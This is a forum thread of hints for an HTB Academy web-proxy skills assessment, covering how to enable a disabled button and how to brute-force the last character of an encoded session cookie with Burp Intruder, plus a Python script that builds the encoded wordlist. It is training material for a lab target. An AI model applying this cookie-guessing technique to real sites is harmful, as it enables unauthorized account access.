HTB Academy - Skills Assessment - Using Web Proxies

can any one help me please ?

You might be looking at it back to front - you've got the cookie, which is the bit that you need to fuzz - load the wordlist - that's your new payload. But it's just that missing letter isn't it at that point, how to get the original decoded cookie into the payload too is your question :smiley: Then apply your payload processing rules to the whole bundle :smiley:

Thanks for this advice. This was super helpful! :slightly_smiling_face:

I couldn't figure out a way to create the payload in Burp (i.e., if I put the original cookie and used the list to add a character on the end, only the character would get encoded with the rules). I created the list outside of Burp manually, and then used it, and was able to get the answer. Another thing to note is you don't need to worry about getting all 200s; see if any of your 200s have different lengths and look at the response in that 200.

@dougthonus, Burp takes a little getting used to, but there is actually a cool way to do this in Burp. I definitely recommend trying this via Intruder again, but this time load the recommended alphanumeric list and use the Burp options to manipulate the payload.

Try putting the 31-digit partial cookie as a prefix to the payload, then just add the different options to rebuild the cookie. It will run through the list building the md5 and then encoding it before sending it as a request.

It could save you time down the road and help you on other challenges.
-onthesauce


So I'm here because I'm stuck on the first question of the whole thing. I was able to complete the others with very little difficulty. So the one I'm stuck on and need a bit of help with is this one:

The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

So I of course tried this with Burp Suite (Pro, as I have a work license). I went to Proxy and made sure it's on. Went to the web address and sent it to the Repeater. However, I cannot for the life of me figure out how to change the "disabled" in the code or even delete it in the response. I've even tried appending ?getflag=true to the web address in Proxy and sending it back to Repeater to see if I could get it to give me what I needed. Not sure what I'm doing wrong, but I'm stuck here.

I got it figured out. Found what I was doing wrong.


If you are stuck on Flag #3, here is my hint.

John


For those who want to encode the payload to hex using ZAP, you need to add an extension called Community Scripts from the Marketplace, then find the to-hex.js script and right-click > Enable to enable that script.


For Q3, don't be a knucklehead like myself. :sweat_smile: You have to enter a flag and not a hash :slight_smile:

I used bash commands to imitate Burp functionality.

Yo Knucklehead 1, nice to meet you, I'm Knucklehead 2 hahaha <3

Thank you for this


I found the flag using Burp Suite. The flag is written in more than one payload for me: every payload with length 1248 has the flag written in it (click on the payload, then on Response below it, then scroll and you will find the flag). First I created the payload list in Linux; you can do it in many ways, the important thing is having the list (the decoded cookie with every letter (a-z), (A-Z) and number (0-9)). Then in the payload processing add:
Base64-encode
Encode as ASCII hex
and I unchecked the box in the payload encoding, then ran the attack. One more tip for the payload position: it is the cookie only, so add this (§) around the cookie, for example:
cookie=§4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a63355954453359586f3d§
and it was a GET request.


Follow what the hint says. Capture the request, send it to Intruder. Then decode the cookie. In Payload processing make sure you encode the cookie twice in the correct order (the finished result should not end with "="). Add the decoded cookie value as a prefix in payload processing. Start the attack. You will get a lot of 200 OK status messages. Click on any one of them and examine the responses.


I had a lot of trouble and this helped out a lot. I spent a while on it and unchecked the prefix and instead had the cookie in the request only, and I got the flag.

My main confusion here was the encoding part of it; I'll write it out to hopefully help someone.

  1. We found a 31-character cookie in the last problem by decoding it, and we need to find its last character.

  2. Obviously, fuzzing is the answer because it lets us guess the last character of the cookie using a payload

  3. The problem (where I got confused) was that our 31-char cookie + 1 char will be in a decoded format, and for the server to read it correctly we need to encode it back.

  4. So there's two ways we can do this:

a. Either send the 31-char cookie + 1-char payload, encode it using the same operations as before (in reverse, since we are encoding), then send the encoded payload back to admin.php.

b. Or you can take the last character, encode it, and append it to the original already encoded cookie for a complete one.

Hope this helps
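The re-encoding step that the posts above walk through (decode the cookie, append each alphanumeric candidate to the 31-character partial, base64-encode the result, then ASCII-hex-encode the base64, and feed that list to Intruder with payload encoding switched off), written out as an added Python example. This is not code from the original thread or from HTB. The value `PARTIAL` is a constructed placeholder of the right shape (a hex digest missing its last character), not the assessment's real cookie, and the helper names (`decode_cookie`, `encode_cookie`, `build_payloads`, `write_wordlist`, `naive_append`) are this example's own.

```python
import base64
import binascii
import string

# Constructed stand-in for the 31-character partial recovered by decoding the
# cookie (an md5 hex digest missing its final character). NOT the real
# assessment cookie; substitute the value you decoded.
PARTIAL = "0123456789abcdef0123456789abcde"

# Same character set as the alphanumeric wordlist the posts suggest loading.
CHARSET = string.ascii_lowercase + string.ascii_uppercase + string.digits


def decode_cookie(hex_cookie: str) -> str:
    """Undo the server's encoding: ASCII hex -> base64 text -> plaintext."""
    b64_bytes = binascii.unhexlify(hex_cookie)
    return base64.b64decode(b64_bytes).decode("ascii")


def encode_cookie(plaintext: str) -> str:
    """Apply the encoding in the order Burp's payload-processing rules need:
    base64 first, then ASCII hex of the base64 text. Because the output is
    hex, it never ends in '=' even though the base64 in the middle may."""
    b64_bytes = base64.b64encode(plaintext.encode("ascii"))
    return binascii.hexlify(b64_bytes).decode("ascii")


def naive_append(encoded_partial: str, last_char: str) -> str:
    """Encode only the guessed character and glue it onto the already-encoded
    partial. Included to show that this is NOT equivalent to re-encoding the
    whole 32-character string: base64 works on 3-byte groups, so the 31st
    and 32nd characters share a group and must be encoded together."""
    return encoded_partial + encode_cookie(last_char)


def build_payloads(partial: str, charset: str = CHARSET) -> dict:
    """Map each candidate final character to the fully encoded cookie value
    that goes into the Cookie header for that guess."""
    return {c: encode_cookie(partial + c) for c in charset}


def write_wordlist(path: str, payloads: dict) -> int:
    """Write the encoded values one per line so they can be loaded into
    Intruder as a simple list with payload encoding unticked (the values are
    already plain hex, so nothing needs URL-encoding). Returns the count."""
    with open(path, "w") as fh:
        for value in payloads.values():
            fh.write(value + "\n")
    return len(payloads)


if __name__ == "__main__":
    payloads = build_payloads(PARTIAL)
    for ch, enc in list(payloads.items())[:3]:
        print(f"{ch} -> {enc}")
    count = write_wordlist("cookie_payloads.txt", payloads)
    print(f"{count} payloads written; each decodes back to the 32-char guess")
```

Two checks worth keeping in mind when you compare this with your Intruder setup: every line in the generated list decodes back to `PARTIAL` plus one candidate, so if a value does not round-trip through `decode_cookie` the processing rules are in the wrong order; and `naive_append` produces a different (and longer) value than `encode_cookie(PARTIAL + c)`, which is why the prefix has to be applied before the base64 rule rather than the encoded character being bolted onto the already-encoded cookie.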

Thank you for this

much appreciated :pray: